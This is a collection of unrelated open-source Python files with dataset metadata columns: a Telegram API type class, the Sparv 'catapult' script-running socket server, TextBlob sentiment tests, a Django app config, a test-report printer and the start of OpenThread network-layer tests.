from ..utils import Object
class CanTransferOwnershipResultPasswordTooFresh(Object):
"""
The 2-step verification was enabled recently, user needs to wait
Attributes:
ID (:obj:`str`): ``CanTransferOwnershipResultPasswordTooFresh``
Args:
retry_after (:obj:`int`):
Time left before the session can be used to transfer ownership of a chat, in seconds
Returns:
CanTransferOwnershipResult
Raises:
:class:`telegram.Error`
"""
ID = "canTransferOwnershipResultPasswordTooFresh"
def __init__(self, retry_after, **kwargs):
self.retry_after = retry_after # int
@staticmethod
def read(q: dict, *args) -> "CanTransferOwnershipResultPasswordTooFresh":
retry_after = q.get('retry_after')
return CanTransferOwnershipResultPasswordTooFresh(retry_after)
| en | 0.757871 | The 2-step verification was enabled recently, user needs to wait Attributes: ID (:obj:`str`): ``CanTransferOwnershipResultPasswordTooFresh`` Args: retry_after (:obj:`int`): Time left before the session can be used to transfer ownership of a chat, in seconds Returns: CanTransferOwnershipResult Raises: :class:`telegram.Error` # int | 2.251375 | 2 |
catapult.py | spraakbanken/sparv-catapult | 0 | 8072 | # -*- coding: utf-8 -*-
# catapult: runs python scripts in already running processes to eliminate the
# python interpreter startup time.
#
# The lexicon for sparv.saldo.annotate and sparv.saldo.compound can be pre-loaded and
# shared between processes. See the variable annotators in handle and start.
#
# Run scripts in the catapult with the c program catalaunch.
from builtins import range, object
from multiprocessing import Process, cpu_count
from decorator import decorator
import logging
import os
import re
import runpy
import socket
import sys
import traceback
import sparv.util as util
RECV_LEN = 4096
# Important to preload all modules otherwise processes will need to do
# it upon request, introducing new delays.
#
# These imports uses the __all__ variables in the __init__ files.
from sparv.util import *
from sparv import *
logging.basicConfig(format="%(process)d %(asctime)-15s %(message)s")
log = logging.getLogger(__name__)
log.setLevel(logging.INFO)
"""
Splits at every space that is not preceded by a backslash.
"""
splitter = re.compile('(?<!\\\\) ')
def set_last_argument(*values):
"""
Decorates a function f, setting its last argument(s) to the given value(s).
Used for setting the saldo lexicons to sparv.saldo.annotate and
sparv.saldo.compound, and the process "dictionary" to sparv.malt.maltparse.
The decorator module is used to give the same signature and
docstring to the function, which is exploited in sparv.util.run.
"""
@decorator
def inner(f, *args, **kwargs):
args = list(args)
for v in values:
args.pop()
for v in values:
args.append(v)
f(*args, **kwargs)
return inner
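# For example (illustrative): set_last_argument(lexicon)(saldo.annotate) yields a wrapper
# that drops the trailing argument it is called with and appends the preloaded lexicon
# instead, so the lexicon does not have to be re-read on every request.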
def handle(client_sock, verbose, annotators):
"""
Handle a client: parse the arguments, change to the relevant
directory, then run the script. Stdout and stderr are directed
to /dev/null or to the client socket.
"""
def chunk_send(msg):
"""
Sends a message chunk until it is totally received in the other end
"""
msg = msg.encode(util.UTF8)
while len(msg) > 0:
sent = client_sock.send(msg)
if sent == 0:
raise RuntimeError("socket connection broken")
msg = msg[sent:]
def set_stdout_stderr():
"""
Put stdout and stderr to the client_sock, if verbose.
Returns the clean-up handler.
"""
class Writer(object):
def write(self, msg):
log.debug(msg)
if verbose:
chunk_send(msg)
def flush(self):
pass
orig_stds = sys.stdout, sys.stderr
w = Writer()
sys.stdout = w
sys.stderr = w
def cleanup():
"""
Restores stdout and stderr
"""
sys.stdout = orig_stds[0]
sys.stderr = orig_stds[1]
client_sock.close()
return cleanup
# Receive data
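    # Wire format, as implemented below: the client sends the caller's working directory
    # followed by the argument vector, separated by unescaped spaces ('\ ' escapes a
    # literal space, '\\' a backslash), and terminates the whole message with a lone '\'.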
data = b""
new_data = None
# Message is terminated with a lone \
while new_data is None or not new_data.endswith(b'\\'):
new_data = client_sock.recv(RECV_LEN)
log.debug("Received %s", new_data)
data += new_data
if len(new_data) == 0:
log.warning("Received null!")
chunk_send("Error when receiving: got an empty message")
return
# Drop the terminating \
data = data[0:-1]
# Split arguments on spaces, and replace '\ ' to ' ' and \\ to \
args = [arg.replace('\\ ', ' ').replace('\\\\', '\\')
for arg in re.split(splitter, data.decode(util.UTF8))]
log.debug("Args: %s", args)
### PING? ###
if len(args) == 2 and args[1] == "PING":
log.info("Ping requested")
chunk_send("PONG")
return
# If the first argument is -m, the following argument is a module
# name instead of a script name
module_flag = len(args) > 2 and args[1] == '-m'
if module_flag:
args.pop(1)
if len(args) > 1:
# First argument is the pwd of the caller
old_pwd = os.getcwd()
pwd = args.pop(0)
log.info('Running %s', args[0])
log.debug('with arguments: %s', ' '.join(args[1:]))
log.debug('in directory %s', pwd)
        # Set stdout and stderr, which returns the cleanup function
cleanup = set_stdout_stderr()
# Run the command
try:
sys.argv = args
os.chdir(pwd)
if module_flag:
annotator = annotators.get(args[0], None)
if not annotator:
# some of the annotators require two arguments
annotator = annotators.get((args[0], args[1]), None)
if annotator:
# skip the first argument now
sys.argv = args[0]
sys.argv.extend(args[2:])
if annotator:
util.run.main(annotator)
else:
runpy.run_module(args[0], run_name='__main__')
else:
runpy.run_path(args[0], run_name='__main__')
except (ImportError, IOError):
# If file does not exist, send the error message
chunk_send("%s\n" % sys.exc_info()[1])
cleanup()
log.exception("File does not exist")
except:
# Send other errors, and if verbose, send tracebacks
chunk_send("%s\n" % sys.exc_info()[1])
traceback.print_exception(*sys.exc_info())
cleanup()
log.exception("Unknown error")
else:
cleanup()
os.chdir(old_pwd)
# Run the cleanup function if there is one (only used with malt)
annotators.get((args[0], 'cleanup'), lambda: None)()
log.info('Completed %s', args[0])
else:
log.info('Cannot handle %s', data)
chunk_send('Cannot handle %s\n' % data)
def worker(server_socket, verbose, annotators, malt_args=None, swener_args=None):
"""
Workers listen to the socket server, and handle incoming requests
    Each process starts its own maltparser process, because they are
cheap and cannot serve multiple clients at the same time.
"""
if malt_args:
process_dict = dict(process=None, restart=True)
def start_malt():
if process_dict['process'] is None or process_dict['restart']:
old_process = process_dict['process']
old_process and util.system.kill_process(old_process)
malt_process = malt.maltstart(**malt_args)
if verbose:
log.info('(Re)started malt process: %s', malt_process)
process_dict['process'] = malt_process
annotators['sparv.malt'] = set_last_argument(process_dict)(malt.maltparse)
elif verbose:
log.info("Not restarting malt this time")
start_malt()
annotators['sparv.malt', 'cleanup'] = start_malt
if swener_args:
process_dict = dict(process=None, restart=True)
def start_swener():
if process_dict['process'] is None or process_dict['restart']:
old_process = process_dict['process']
old_process and util.system.kill_process(old_process)
swener_process = swener.swenerstart(**swener_args)
if verbose:
log.info('(Re)started SweNER process: %s', swener_process)
process_dict['process'] = swener_process
annotators['sparv.swener'] = set_last_argument(process_dict)(swener.tag_ne)
elif verbose:
log.info("Not restarting SweNER this time")
start_swener()
annotators['sparv.swener', 'cleanup'] = start_swener
if verbose:
log.info("Worker running!")
while True:
client_sock, addr = server_socket.accept()
try:
handle(client_sock, verbose, annotators)
except:
log.exception('Error in handling code')
traceback.print_exception(*sys.exc_info())
client_sock.close()
def start(socket_path, processes=1, verbose='false',
saldo_model=None, compound_model=None, stats_model=None,
dalin_model=None, swedberg_model=None, blingbring_model=None,
malt_jar=None, malt_model=None, malt_encoding=util.UTF8,
sentiment_model=None, swefn_model=None, swener=False,
swener_encoding=util.UTF8):
"""
Starts a catapult on a socket file, using a number of processes.
If verbose is false, all stdout and stderr programs produce is
piped to /dev/null, otherwise it is sent to the client. The
computation is done by the catapult processes, however.
Regardless of what verbose is, client errors should be reported
both in the catapult and to the client.
The saldo model and compound model can be pre-loaded and shared in
memory between processes.
Start processes using catalaunch.
"""
if os.path.exists(socket_path):
log.error('socket %s already exists', socket_path)
exit(1)
verbose = verbose.lower() == 'true'
log.info('Verbose: %s', verbose)
# If processes does not contain an int, set it to the number of processors
try:
processes = int(processes)
except:
processes = cpu_count()
# Start the socket
server_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
server_socket.bind(socket_path)
server_socket.listen(processes)
# The dictionary of functions with saved lexica, indexed by module name strings
annotators = {}
# Load Saldo and older lexicons
lexicons = [m for m in [saldo_model, dalin_model, swedberg_model] if m]
if lexicons:
lexicon_dict = {}
for lexicon in lexicons:
lexicon_dict[os.path.basename(lexicon).rstrip(".pickle")] = saldo.SaldoLexicon(lexicon)
annotators['sparv.saldo'] = set_last_argument(lexicon_dict)(saldo.annotate)
if stats_model and compound_model:
annotators['sparv.compound'] = set_last_argument(
compound.SaldoCompLexicon(compound_model),
compound.StatsLexicon(stats_model))(compound.annotate)
elif compound_model:
annotators['sparv.compound_simple'] = set_last_argument(
compound_simple.SaldoLexicon(compound_model))(compound_simple.annotate)
# if blingbring_model:
# annotators['sparv.lexical_classes'] = set_last_argument(
# util.PickledLexicon(blingbring_model))(lexical_classes.annotate_bb_words)
# if swefn_model:
# annotators['sparv.lexical_classes'] = set_last_argument(
# util.PickledLexicon(swefn_model))(lexical_classes.annotate_swefn_words)
if sentiment_model:
annotators['sparv.sentiment'] = set_last_argument(
util.PickledLexicon(sentiment_model))(sentiment.sentiment)
# if models_1700s:
# models = models_1700s.split()
# lexicons = [saldo.SaldoLexicon(lex) for lex in models]
# annotators[('sparv.fsv', '--annotate_fallback')] = set_last_argument(lexicons)(fsv.annotate_fallback)
# annotators[('sparv.fsv', '--annotate_full')] = set_last_argument(lexicons)(fsv.annotate_full)
if verbose:
log.info('Loaded annotators: %s', list(annotators.keys()))
if malt_jar and malt_model:
malt_args = dict(maltjar=malt_jar, model=malt_model,
encoding=malt_encoding, send_empty_sentence=True)
else:
malt_args = None
if swener:
swener_args = dict(stdin="", encoding=swener_encoding, verbose=True)
else:
swener_args = None
# Start processes-1 workers
workers = [Process(target=worker, args=[server_socket, verbose, annotators, malt_args])
for i in range(processes - 1)]
for p in workers:
p.start()
# Additionally, let this thread be worker 0
worker(server_socket, verbose, annotators, malt_args, swener_args)
if __name__ == '__main__':
util.run.main(start)
| # -*- coding: utf-8 -*-
# catapult: runs python scripts in already running processes to eliminate the
# python interpreter startup time.
#
# The lexicon for sparv.saldo.annotate and sparv.saldo.compound can be pre-loaded and
# shared between processes. See the variable annotators in handle and start.
#
# Run scripts in the catapult with the c program catalaunch.
from builtins import range, object
from multiprocessing import Process, cpu_count
from decorator import decorator
import logging
import os
import re
import runpy
import socket
import sys
import traceback
import sparv.util as util
RECV_LEN = 4096
# Important to preload all modules otherwise processes will need to do
# it upon request, introducing new delays.
#
# These imports uses the __all__ variables in the __init__ files.
from sparv.util import *
from sparv import *
logging.basicConfig(format="%(process)d %(asctime)-15s %(message)s")
log = logging.getLogger(__name__)
log.setLevel(logging.INFO)
"""
Splits at every space that is not preceded by a backslash.
"""
splitter = re.compile('(?<!\\\\) ')
def set_last_argument(*values):
"""
Decorates a function f, setting its last argument(s) to the given value(s).
Used for setting the saldo lexicons to sparv.saldo.annotate and
sparv.saldo.compound, and the process "dictionary" to sparv.malt.maltparse.
The decorator module is used to give the same signature and
docstring to the function, which is exploited in sparv.util.run.
"""
@decorator
def inner(f, *args, **kwargs):
args = list(args)
for v in values:
args.pop()
for v in values:
args.append(v)
f(*args, **kwargs)
return inner
def handle(client_sock, verbose, annotators):
"""
Handle a client: parse the arguments, change to the relevant
directory, then run the script. Stdout and stderr are directed
to /dev/null or to the client socket.
"""
def chunk_send(msg):
"""
Sends a message chunk until it is totally received in the other end
"""
msg = msg.encode(util.UTF8)
while len(msg) > 0:
sent = client_sock.send(msg)
if sent == 0:
raise RuntimeError("socket connection broken")
msg = msg[sent:]
def set_stdout_stderr():
"""
Put stdout and stderr to the client_sock, if verbose.
Returns the clean-up handler.
"""
class Writer(object):
def write(self, msg):
log.debug(msg)
if verbose:
chunk_send(msg)
def flush(self):
pass
orig_stds = sys.stdout, sys.stderr
w = Writer()
sys.stdout = w
sys.stderr = w
def cleanup():
"""
Restores stdout and stderr
"""
sys.stdout = orig_stds[0]
sys.stderr = orig_stds[1]
client_sock.close()
return cleanup
# Receive data
data = b""
new_data = None
# Message is terminated with a lone \
while new_data is None or not new_data.endswith(b'\\'):
new_data = client_sock.recv(RECV_LEN)
log.debug("Received %s", new_data)
data += new_data
if len(new_data) == 0:
log.warning("Received null!")
chunk_send("Error when receiving: got an empty message")
return
# Drop the terminating \
data = data[0:-1]
# Split arguments on spaces, and replace '\ ' to ' ' and \\ to \
args = [arg.replace('\\ ', ' ').replace('\\\\', '\\')
for arg in re.split(splitter, data.decode(util.UTF8))]
log.debug("Args: %s", args)
### PING? ###
if len(args) == 2 and args[1] == "PING":
log.info("Ping requested")
chunk_send("PONG")
return
# If the first argument is -m, the following argument is a module
# name instead of a script name
module_flag = len(args) > 2 and args[1] == '-m'
if module_flag:
args.pop(1)
if len(args) > 1:
# First argument is the pwd of the caller
old_pwd = os.getcwd()
pwd = args.pop(0)
log.info('Running %s', args[0])
log.debug('with arguments: %s', ' '.join(args[1:]))
log.debug('in directory %s', pwd)
        # Set stdout and stderr, which returns the cleanup function
cleanup = set_stdout_stderr()
# Run the command
try:
sys.argv = args
os.chdir(pwd)
if module_flag:
annotator = annotators.get(args[0], None)
if not annotator:
# some of the annotators require two arguments
annotator = annotators.get((args[0], args[1]), None)
if annotator:
# skip the first argument now
sys.argv = args[0]
sys.argv.extend(args[2:])
if annotator:
util.run.main(annotator)
else:
runpy.run_module(args[0], run_name='__main__')
else:
runpy.run_path(args[0], run_name='__main__')
except (ImportError, IOError):
# If file does not exist, send the error message
chunk_send("%s\n" % sys.exc_info()[1])
cleanup()
log.exception("File does not exist")
except:
# Send other errors, and if verbose, send tracebacks
chunk_send("%s\n" % sys.exc_info()[1])
traceback.print_exception(*sys.exc_info())
cleanup()
log.exception("Unknown error")
else:
cleanup()
os.chdir(old_pwd)
# Run the cleanup function if there is one (only used with malt)
annotators.get((args[0], 'cleanup'), lambda: None)()
log.info('Completed %s', args[0])
else:
log.info('Cannot handle %s', data)
chunk_send('Cannot handle %s\n' % data)
def worker(server_socket, verbose, annotators, malt_args=None, swener_args=None):
"""
Workers listen to the socket server, and handle incoming requests
    Each process starts its own maltparser process, because they are
cheap and cannot serve multiple clients at the same time.
"""
if malt_args:
process_dict = dict(process=None, restart=True)
def start_malt():
if process_dict['process'] is None or process_dict['restart']:
old_process = process_dict['process']
old_process and util.system.kill_process(old_process)
malt_process = malt.maltstart(**malt_args)
if verbose:
log.info('(Re)started malt process: %s', malt_process)
process_dict['process'] = malt_process
annotators['sparv.malt'] = set_last_argument(process_dict)(malt.maltparse)
elif verbose:
log.info("Not restarting malt this time")
start_malt()
annotators['sparv.malt', 'cleanup'] = start_malt
if swener_args:
process_dict = dict(process=None, restart=True)
def start_swener():
if process_dict['process'] is None or process_dict['restart']:
old_process = process_dict['process']
old_process and util.system.kill_process(old_process)
swener_process = swener.swenerstart(**swener_args)
if verbose:
log.info('(Re)started SweNER process: %s', swener_process)
process_dict['process'] = swener_process
annotators['sparv.swener'] = set_last_argument(process_dict)(swener.tag_ne)
elif verbose:
log.info("Not restarting SweNER this time")
start_swener()
annotators['sparv.swener', 'cleanup'] = start_swener
if verbose:
log.info("Worker running!")
while True:
client_sock, addr = server_socket.accept()
try:
handle(client_sock, verbose, annotators)
except:
log.exception('Error in handling code')
traceback.print_exception(*sys.exc_info())
client_sock.close()
def start(socket_path, processes=1, verbose='false',
saldo_model=None, compound_model=None, stats_model=None,
dalin_model=None, swedberg_model=None, blingbring_model=None,
malt_jar=None, malt_model=None, malt_encoding=util.UTF8,
sentiment_model=None, swefn_model=None, swener=False,
swener_encoding=util.UTF8):
"""
Starts a catapult on a socket file, using a number of processes.
If verbose is false, all stdout and stderr programs produce is
piped to /dev/null, otherwise it is sent to the client. The
computation is done by the catapult processes, however.
Regardless of what verbose is, client errors should be reported
both in the catapult and to the client.
The saldo model and compound model can be pre-loaded and shared in
memory between processes.
Start processes using catalaunch.
"""
if os.path.exists(socket_path):
log.error('socket %s already exists', socket_path)
exit(1)
verbose = verbose.lower() == 'true'
log.info('Verbose: %s', verbose)
# If processes does not contain an int, set it to the number of processors
try:
processes = int(processes)
except:
processes = cpu_count()
# Start the socket
server_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
server_socket.bind(socket_path)
server_socket.listen(processes)
# The dictionary of functions with saved lexica, indexed by module name strings
annotators = {}
# Load Saldo and older lexicons
lexicons = [m for m in [saldo_model, dalin_model, swedberg_model] if m]
if lexicons:
lexicon_dict = {}
for lexicon in lexicons:
lexicon_dict[os.path.basename(lexicon).rstrip(".pickle")] = saldo.SaldoLexicon(lexicon)
annotators['sparv.saldo'] = set_last_argument(lexicon_dict)(saldo.annotate)
if stats_model and compound_model:
annotators['sparv.compound'] = set_last_argument(
compound.SaldoCompLexicon(compound_model),
compound.StatsLexicon(stats_model))(compound.annotate)
elif compound_model:
annotators['sparv.compound_simple'] = set_last_argument(
compound_simple.SaldoLexicon(compound_model))(compound_simple.annotate)
# if blingbring_model:
# annotators['sparv.lexical_classes'] = set_last_argument(
# util.PickledLexicon(blingbring_model))(lexical_classes.annotate_bb_words)
# if swefn_model:
# annotators['sparv.lexical_classes'] = set_last_argument(
# util.PickledLexicon(swefn_model))(lexical_classes.annotate_swefn_words)
if sentiment_model:
annotators['sparv.sentiment'] = set_last_argument(
util.PickledLexicon(sentiment_model))(sentiment.sentiment)
# if models_1700s:
# models = models_1700s.split()
# lexicons = [saldo.SaldoLexicon(lex) for lex in models]
# annotators[('sparv.fsv', '--annotate_fallback')] = set_last_argument(lexicons)(fsv.annotate_fallback)
# annotators[('sparv.fsv', '--annotate_full')] = set_last_argument(lexicons)(fsv.annotate_full)
if verbose:
log.info('Loaded annotators: %s', list(annotators.keys()))
if malt_jar and malt_model:
malt_args = dict(maltjar=malt_jar, model=malt_model,
encoding=malt_encoding, send_empty_sentence=True)
else:
malt_args = None
if swener:
swener_args = dict(stdin="", encoding=swener_encoding, verbose=True)
else:
swener_args = None
# Start processes-1 workers
workers = [Process(target=worker, args=[server_socket, verbose, annotators, malt_args])
for i in range(processes - 1)]
for p in workers:
p.start()
# Additionally, let this thread be worker 0
worker(server_socket, verbose, annotators, malt_args, swener_args)
if __name__ == '__main__':
util.run.main(start)
| en | 0.765183 | # -*- coding: utf-8 -*- # catapult: runs python scripts in already running processes to eliminate the # python interpreter startup time. # # The lexicon for sparv.saldo.annotate and sparv.saldo.compound can be pre-loaded and # shared between processes. See the variable annotators in handle and start. # # Run scripts in the catapult with the c program catalaunch. # Important to preload all modules otherwise processes will need to do # it upon request, introducing new delays. # # These imports uses the __all__ variables in the __init__ files. Splits at every space that is not preceded by a backslash. Decorates a function f, setting its last argument(s) to the given value(s). Used for setting the saldo lexicons to sparv.saldo.annotate and sparv.saldo.compound, and the process "dictionary" to sparv.malt.maltparse. The decorator module is used to give the same signature and docstring to the function, which is exploited in sparv.util.run. Handle a client: parse the arguments, change to the relevant directory, then run the script. Stdout and stderr are directed to /dev/null or to the client socket. Sends a message chunk until it is totally received in the other end Put stdout and stderr to the client_sock, if verbose. Returns the clean-up handler. Restores stdout and stderr # Receive data # Message is terminated with a lone \ # Drop the terminating \ # Split arguments on spaces, and replace '\ ' to ' ' and \\ to \ ### PING? ### # If the first argument is -m, the following argument is a module # name instead of a script name # First argument is the pwd of the caller # Set stdout and stderr, which returns the cleaup function # Run the command # some of the annotators require two arguments # skip the first argument now # If file does not exist, send the error message # Send other errors, and if verbose, send tracebacks # Run the cleanup function if there is one (only used with malt) Workers listen to the socket server, and handle incoming requests Each process starts an own maltparser process, because they are cheap and cannot serve multiple clients at the same time. Starts a catapult on a socket file, using a number of processes. If verbose is false, all stdout and stderr programs produce is piped to /dev/null, otherwise it is sent to the client. The computation is done by the catapult processes, however. Regardless of what verbose is, client errors should be reported both in the catapult and to the client. The saldo model and compound model can be pre-loaded and shared in memory between processes. Start processes using catalaunch. # If processes does not contain an int, set it to the number of processors # Start the socket # The dictionary of functions with saved lexica, indexed by module name strings # Load Saldo and older lexicons # if blingbring_model: # annotators['sparv.lexical_classes'] = set_last_argument( # util.PickledLexicon(blingbring_model))(lexical_classes.annotate_bb_words) # if swefn_model: # annotators['sparv.lexical_classes'] = set_last_argument( # util.PickledLexicon(swefn_model))(lexical_classes.annotate_swefn_words) # if models_1700s: # models = models_1700s.split() # lexicons = [saldo.SaldoLexicon(lex) for lex in models] # annotators[('sparv.fsv', '--annotate_fallback')] = set_last_argument(lexicons)(fsv.annotate_fallback) # annotators[('sparv.fsv', '--annotate_full')] = set_last_argument(lexicons)(fsv.annotate_full) # Start processes-1 workers # Additionally, let this thread be worker 0 | 2.301459 | 2 |
tests/test_sentiments.py | rajeshkumargp/TextBlob | 6,608 | 8073 | <reponame>rajeshkumargp/TextBlob
from __future__ import unicode_literals
import unittest
from nose.tools import * # PEP8 asserts
from nose.plugins.attrib import attr
from textblob.sentiments import PatternAnalyzer, NaiveBayesAnalyzer, DISCRETE, CONTINUOUS
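# PatternAnalyzer yields a continuous (polarity, subjectivity) pair, while NaiveBayesAnalyzer
# yields a discrete classification together with class probabilities; the two test classes
# below assert exactly that split.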
class TestPatternSentiment(unittest.TestCase):
def setUp(self):
self.analyzer = PatternAnalyzer()
def test_kind(self):
assert_equal(self.analyzer.kind, CONTINUOUS)
def test_analyze(self):
p1 = "I feel great this morning."
n1 = "This is a terrible car."
p1_result = self.analyzer.analyze(p1)
n1_result = self.analyzer.analyze(n1)
assert_true(p1_result[0] > 0)
assert_true(n1_result[0] < 0)
assert_equal(p1_result.polarity, p1_result[0])
assert_equal(p1_result.subjectivity, p1_result[1])
def test_analyze_assessments(self):
p1 = "I feel great this morning."
n1 = "This is a terrible car."
p1_result = self.analyzer.analyze(p1,keep_assessments=True)
n1_result = self.analyzer.analyze(n1,keep_assessments=True)
p1_assessment = p1_result.assessments[0]
n1_assessment = n1_result.assessments[0]
assert_true(p1_assessment[1] > 0)
assert_true(n1_assessment[1] < 0)
assert_equal(p1_result.polarity, p1_assessment[1])
assert_equal(p1_result.subjectivity, p1_assessment[2])
class TestNaiveBayesAnalyzer(unittest.TestCase):
def setUp(self):
self.analyzer = NaiveBayesAnalyzer()
def test_kind(self):
assert_equal(self.analyzer.kind, DISCRETE)
@attr('slow')
def test_analyze(self):
p1 = 'I feel great this morning.'
n1 = 'This is a terrible car.'
p1_result = self.analyzer.analyze(p1)
assert_equal(p1_result[0], 'pos')
assert_equal(self.analyzer.analyze(n1)[0], 'neg')
# The 2nd item should be the probability that it is positive
assert_true(isinstance(p1_result[1], float))
# 3rd item is probability that it is negative
assert_true(isinstance(p1_result[2], float))
assert_about_equal(p1_result[1] + p1_result[2], 1)
assert_equal(p1_result.classification, p1_result[0])
assert_equal(p1_result.p_pos, p1_result[1])
assert_equal(p1_result.p_neg, p1_result[2])
def assert_about_equal(first, second, places=4):
return assert_equal(round(first, places), second)
if __name__ == '__main__':
unittest.main()
| from __future__ import unicode_literals
import unittest
from nose.tools import * # PEP8 asserts
from nose.plugins.attrib import attr
from textblob.sentiments import PatternAnalyzer, NaiveBayesAnalyzer, DISCRETE, CONTINUOUS
class TestPatternSentiment(unittest.TestCase):
def setUp(self):
self.analyzer = PatternAnalyzer()
def test_kind(self):
assert_equal(self.analyzer.kind, CONTINUOUS)
def test_analyze(self):
p1 = "I feel great this morning."
n1 = "This is a terrible car."
p1_result = self.analyzer.analyze(p1)
n1_result = self.analyzer.analyze(n1)
assert_true(p1_result[0] > 0)
assert_true(n1_result[0] < 0)
assert_equal(p1_result.polarity, p1_result[0])
assert_equal(p1_result.subjectivity, p1_result[1])
def test_analyze_assessments(self):
p1 = "I feel great this morning."
n1 = "This is a terrible car."
p1_result = self.analyzer.analyze(p1,keep_assessments=True)
n1_result = self.analyzer.analyze(n1,keep_assessments=True)
p1_assessment = p1_result.assessments[0]
n1_assessment = n1_result.assessments[0]
assert_true(p1_assessment[1] > 0)
assert_true(n1_assessment[1] < 0)
assert_equal(p1_result.polarity, p1_assessment[1])
assert_equal(p1_result.subjectivity, p1_assessment[2])
class TestNaiveBayesAnalyzer(unittest.TestCase):
def setUp(self):
self.analyzer = NaiveBayesAnalyzer()
def test_kind(self):
assert_equal(self.analyzer.kind, DISCRETE)
@attr('slow')
def test_analyze(self):
p1 = 'I feel great this morning.'
n1 = 'This is a terrible car.'
p1_result = self.analyzer.analyze(p1)
assert_equal(p1_result[0], 'pos')
assert_equal(self.analyzer.analyze(n1)[0], 'neg')
# The 2nd item should be the probability that it is positive
assert_true(isinstance(p1_result[1], float))
# 3rd item is probability that it is negative
assert_true(isinstance(p1_result[2], float))
assert_about_equal(p1_result[1] + p1_result[2], 1)
assert_equal(p1_result.classification, p1_result[0])
assert_equal(p1_result.p_pos, p1_result[1])
assert_equal(p1_result.p_neg, p1_result[2])
def assert_about_equal(first, second, places=4):
return assert_equal(round(first, places), second)
if __name__ == '__main__':
unittest.main() | en | 0.964436 | # PEP8 asserts # The 2nd item should be the probability that it is positive # 3rd item is probability that it is negative | 2.613345 | 3 |
src/unicef_security/apps.py | unicef/unicef-security | 0 | 8074 | <reponame>unicef/unicef-security
from django.apps import AppConfig
class Config(AppConfig):
name = 'unicef_security'
verbose_name = "UNICEF Security"
| from django.apps import AppConfig
class Config(AppConfig):
name = 'unicef_security'
verbose_name = "UNICEF Security" | none | 1 | 1.145537 | 1 |
|
utils/pretty-tests.py | isJuhn/pcsx2_ipc | 7 | 8075 | <gh_stars>1-10
import json
import sys
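# Load the JSON test report whose path is passed as the first CLI argument; the report is
# expected to carry "result", "duration" and "stdout" fields.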
f = open(sys.argv[1])
y = json.loads(f.read())
print("Tests results: " + str(y["result"]))
print("Tests duration: " + str(y["duration"]))
print("Tests output:\n~~~~~~~~~~~~~~~~~~~~\n" + str(y["stdout"]))
| import json
import sys
f = open(sys.argv[1])
y = json.loads(f.read())
print("Tests results: " + str(y["result"]))
print("Tests duration: " + str(y["duration"]))
print("Tests output:\n~~~~~~~~~~~~~~~~~~~~\n" + str(y["stdout"])) | none | 1 | 2.811933 | 3 |
|
tests/scripts/thread-cert/test_network_layer.py | AdityaHPatwardhan/openthread | 2,962 | 8076 | <gh_stars>1000+
#!/usr/bin/env python3
#
# Copyright (c) 2016, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import io
import random
import struct
import unittest
import common
import network_layer
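# The any_* helpers below build randomized field values so every run of the TLV tests
# exercises different byte patterns.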
def any_eid():
return bytearray([random.getrandbits(8) for _ in range(16)])
def any_mac_extended_address():
return bytearray([random.getrandbits(8) for _ in range(8)])
def any_rloc16():
return random.getrandbits(16)
def any_ml_eid():
return bytearray([random.getrandbits(8) for _ in range(8)])
def any_status():
return random.getrandbits(1)
def any_seconds():
return random.getrandbits(32)
def any_id_sequence():
return random.getrandbits(8)
def any_router_id_mask():
return random.getrandbits(64)
def any_options(count=None):
count = count if count is not None else random.randint(0, 255)
return [random.getrandbits(8) for _ in range(count)]
def any_tlv_data(length=None):
_type = random.getrandbits(8)
length = length if length is not None else random.getrandbits(8)
value = bytearray([random.getrandbits(8) for _ in range(length)])
return bytearray([_type, length]) + value
def any_tlvs_data(count=None):
count = count if count is not None else random.randint(0, 16)
data = bytearray()
for _ in range(count):
data += any_tlv_data(random.randint(1, 15))
return data
class TestTargetEid(unittest.TestCase):
def test_should_return_eid_value_when_eid_property_is_called(self):
# GIVEN
eid = any_eid()
target_eid = network_layer.TargetEid(eid)
# WHEN
actual_eid = target_eid.eid
# THEN
self.assertEqual(eid, actual_eid)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
eid = any_eid()
target_eid = network_layer.TargetEid(eid)
# THEN
self.assertEqual(target_eid, network_layer.TargetEid(eid))
class TestTargetEidFactory(unittest.TestCase):
def test_should_create_TargetEid_from_bytearray_when_parse_method_is_called(self):
# GIVEN
eid = any_eid()
factory = network_layer.TargetEidFactory()
# WHEN
target_eid = factory.parse(io.BytesIO(eid), common.MessageInfo())
# THEN
self.assertTrue(isinstance(target_eid, network_layer.TargetEid))
self.assertEqual(eid, target_eid.eid)
class TestMacExtendedAddress(unittest.TestCase):
def test_should_return_mac_address_value_when_mac_address_property_is_called(self):
# GIVEN
mac_address = any_mac_extended_address()
mac_extended_address = network_layer.MacExtendedAddress(mac_address)
# WHEN
actual_mac_address = mac_extended_address.mac_address
# THEN
self.assertEqual(mac_address, actual_mac_address)
def test_should_return_True_when_try_to_equal_two_the_same_type_objects_with_the_same_values(self):
# GIVEN
mac_address = any_mac_extended_address()
mac_extended_address = network_layer.MacExtendedAddress(mac_address)
# THEN
